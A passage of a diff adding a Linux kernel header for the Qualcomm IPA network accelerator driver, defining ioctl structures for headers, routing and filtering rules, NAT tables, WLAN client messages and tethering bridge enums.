+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
